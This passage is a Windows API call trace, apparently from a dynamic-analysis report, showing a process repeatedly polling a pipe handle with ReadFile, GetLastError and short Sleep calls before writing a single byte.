	[0196.930] GetLastError () returned 0x218
	[0196.930] Sleep (dwMilliseconds=0xa) 
	[0196.978] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0196.978] GetLastError () returned 0x218
	[0196.978] Sleep (dwMilliseconds=0xa) 
	[0197.013] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0197.013] GetLastError () returned 0x218
	[0197.013] Sleep (dwMilliseconds=0xa) 
	[0197.060] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0197.060] GetLastError () returned 0x218
	[0197.060] Sleep (dwMilliseconds=0xa) 
	[0197.153] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0197.153] GetLastError () returned 0x218
	[0197.153] Sleep (dwMilliseconds=0xa) 
	[0197.235] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0197.235] GetLastError () returned 0x218
	[0197.235] Sleep (dwMilliseconds=0xa) 
	[0197.262] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0197.262] GetLastError () returned 0x218
	[0197.262] Sleep (dwMilliseconds=0xa) 
	[0197.278] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0197.278] GetLastError () returned 0x218
	[0197.278] Sleep (dwMilliseconds=0xa) 
	[0197.312] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0197.312] GetLastError () returned 0x218
	[0197.312] Sleep (dwMilliseconds=0xa) 
	[0197.403] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0197.403] GetLastError () returned 0x218
	[0197.403] Sleep (dwMilliseconds=0xa) 
	[0197.499] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0197.499] GetLastError () returned 0x218
	[0197.499] Sleep (dwMilliseconds=0xa) 
	[0197.577] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0197.577] GetLastError () returned 0x218
	[0197.577] Sleep (dwMilliseconds=0xa) 
	[0197.636] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0197.636] GetLastError () returned 0x218
	[0197.636] Sleep (dwMilliseconds=0xa) 
	[0197.671] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0197.671] GetLastError () returned 0x218
	[0197.671] Sleep (dwMilliseconds=0xa) 
	[0197.707] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0197.707] GetLastError () returned 0x218
	[0197.707] Sleep (dwMilliseconds=0xa) 
	[0197.782] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0197.782] GetLastError () returned 0x218
	[0197.782] Sleep (dwMilliseconds=0xa) 
	[0197.860] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0197.860] GetLastError () returned 0x218
	[0197.860] Sleep (dwMilliseconds=0xa) 
	[0197.921] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0197.921] GetLastError () returned 0x218
	[0197.921] Sleep (dwMilliseconds=0xa) 
	[0197.958] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0197.958] GetLastError () returned 0x218
	[0197.958] Sleep (dwMilliseconds=0xa) 
	[0198.007] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.007] GetLastError () returned 0x218
	[0198.007] Sleep (dwMilliseconds=0xa) 
	[0198.085] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.085] GetLastError () returned 0x218
	[0198.085] Sleep (dwMilliseconds=0xa) 
	[0198.171] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.171] GetLastError () returned 0x218
	[0198.172] Sleep (dwMilliseconds=0xa) 
	[0198.387] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.390] GetLastError () returned 0x218
	[0198.394] Sleep (dwMilliseconds=0xa) 
	[0198.405] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.405] GetLastError () returned 0x218
	[0198.406] Sleep (dwMilliseconds=0xa) 
	[0198.464] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.464] GetLastError () returned 0x218
	[0198.464] Sleep (dwMilliseconds=0xa) 
	[0198.510] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.511] GetLastError () returned 0x218
	[0198.511] Sleep (dwMilliseconds=0xa) 
	[0198.526] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.526] GetLastError () returned 0x218
	[0198.526] Sleep (dwMilliseconds=0xa) 
	[0198.545] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.545] GetLastError () returned 0x218
	[0198.545] Sleep (dwMilliseconds=0xa) 
	[0198.557] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.558] GetLastError () returned 0x218
	[0198.558] Sleep (dwMilliseconds=0xa) 
	[0198.573] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.573] GetLastError () returned 0x218
	[0198.573] Sleep (dwMilliseconds=0xa) 
	[0198.589] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.589] GetLastError () returned 0x218
	[0198.589] Sleep (dwMilliseconds=0xa) 
	[0198.607] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.607] GetLastError () returned 0x218
	[0198.607] Sleep (dwMilliseconds=0xa) 
	[0198.634] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.634] GetLastError () returned 0x218
	[0198.634] Sleep (dwMilliseconds=0xa) 
	[0198.682] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.682] GetLastError () returned 0x218
	[0198.682] Sleep (dwMilliseconds=0xa) 
	[0198.729] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.729] GetLastError () returned 0x218
	[0198.729] Sleep (dwMilliseconds=0xa) 
	[0198.745] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.745] GetLastError () returned 0x218
	[0198.745] Sleep (dwMilliseconds=0xa) 
	[0198.760] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.760] GetLastError () returned 0x218
	[0198.760] Sleep (dwMilliseconds=0xa) 
	[0198.776] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.776] GetLastError () returned 0x218
	[0198.776] Sleep (dwMilliseconds=0xa) 
	[0198.791] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.791] GetLastError () returned 0x218
	[0198.791] Sleep (dwMilliseconds=0xa) 
	[0198.808] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.808] GetLastError () returned 0x218
	[0198.808] Sleep (dwMilliseconds=0xa) 
	[0198.822] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.823] GetLastError () returned 0x218
	[0198.823] Sleep (dwMilliseconds=0xa) 
	[0198.838] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.838] GetLastError () returned 0x218
	[0198.838] Sleep (dwMilliseconds=0xa) 
	[0198.897] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.898] GetLastError () returned 0x218
	[0198.898] Sleep (dwMilliseconds=0xa) 
	[0198.978] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.978] GetLastError () returned 0x218
	[0198.978] Sleep (dwMilliseconds=0xa) 
	[0198.992] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0198.993] GetLastError () returned 0x218
	[0198.993] Sleep (dwMilliseconds=0xa) 
	[0199.000] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.000] GetLastError () returned 0x218
	[0199.000] Sleep (dwMilliseconds=0xa) 
	[0199.010] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.010] GetLastError () returned 0x218
	[0199.010] Sleep (dwMilliseconds=0xa) 
	[0199.026] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.026] GetLastError () returned 0x218
	[0199.026] Sleep (dwMilliseconds=0xa) 
	[0199.041] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.041] GetLastError () returned 0x218
	[0199.041] Sleep (dwMilliseconds=0xa) 
	[0199.057] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.057] GetLastError () returned 0x218
	[0199.057] Sleep (dwMilliseconds=0xa) 
	[0199.072] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.072] GetLastError () returned 0x218
	[0199.072] Sleep (dwMilliseconds=0xa) 
	[0199.088] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.088] GetLastError () returned 0x218
	[0199.088] Sleep (dwMilliseconds=0xa) 
	[0199.135] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.135] GetLastError () returned 0x218
	[0199.135] Sleep (dwMilliseconds=0xa) 
	[0199.179] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.179] GetLastError () returned 0x218
	[0199.179] Sleep (dwMilliseconds=0xa) 
	[0199.205] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.205] GetLastError () returned 0x218
	[0199.205] Sleep (dwMilliseconds=0xa) 
	[0199.213] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.213] GetLastError () returned 0x218
	[0199.213] Sleep (dwMilliseconds=0xa) 
	[0199.228] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.228] GetLastError () returned 0x218
	[0199.228] Sleep (dwMilliseconds=0xa) 
	[0199.244] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.244] GetLastError () returned 0x218
	[0199.244] Sleep (dwMilliseconds=0xa) 
	[0199.259] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.260] GetLastError () returned 0x218
	[0199.260] Sleep (dwMilliseconds=0xa) 
	[0199.275] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.275] GetLastError () returned 0x218
	[0199.275] Sleep (dwMilliseconds=0xa) 
	[0199.291] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.291] GetLastError () returned 0x218
	[0199.291] Sleep (dwMilliseconds=0xa) 
	[0199.307] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.307] GetLastError () returned 0x218
	[0199.307] Sleep (dwMilliseconds=0xa) 
	[0199.353] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.353] GetLastError () returned 0x218
	[0199.353] Sleep (dwMilliseconds=0xa) 
	[0199.400] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.400] GetLastError () returned 0x218
	[0199.400] Sleep (dwMilliseconds=0xa) 
	[0199.429] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.429] GetLastError () returned 0x218
	[0199.429] Sleep (dwMilliseconds=0xa) 
	[0199.431] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.431] GetLastError () returned 0x218
	[0199.431] Sleep (dwMilliseconds=0xa) 
	[0199.447] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.447] GetLastError () returned 0x218
	[0199.447] Sleep (dwMilliseconds=0xa) 
	[0199.463] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.463] GetLastError () returned 0x218
	[0199.463] Sleep (dwMilliseconds=0xa) 
	[0199.478] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.478] GetLastError () returned 0x218
	[0199.478] Sleep (dwMilliseconds=0xa) 
	[0199.540] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.540] GetLastError () returned 0x218
	[0199.540] Sleep (dwMilliseconds=0xa) 
	[0199.681] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.681] GetLastError () returned 0x218
	[0199.681] Sleep (dwMilliseconds=0xa) 
	[0199.774] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.774] GetLastError () returned 0x218
	[0199.774] Sleep (dwMilliseconds=0xa) 
	[0199.815] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.815] GetLastError () returned 0x218
	[0199.815] Sleep (dwMilliseconds=0xa) 
	[0199.821] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.821] GetLastError () returned 0x218
	[0199.821] Sleep (dwMilliseconds=0xa) 
	[0199.837] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.837] GetLastError () returned 0x218
	[0199.837] Sleep (dwMilliseconds=0xa) 
	[0199.852] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0199.852] GetLastError () returned 0x218
	[0199.852] Sleep (dwMilliseconds=0x3e8) 
	[0200.866] WriteFile (in: hFile=0x240, lpBuffer=0x108f208, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0) returned 0
	[0200.866] Sleep (dwMilliseconds=0xa) 
	[0200.884] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0200.884] GetLastError () returned 0x218
	[0200.884] Sleep (dwMilliseconds=0xa) 
	[0200.898] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0200.898] GetLastError () returned 0x218
	[0200.898] Sleep (dwMilliseconds=0xa) 
	[0200.913] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0200.913] GetLastError () returned 0x218
	[0200.913] Sleep (dwMilliseconds=0xa) 
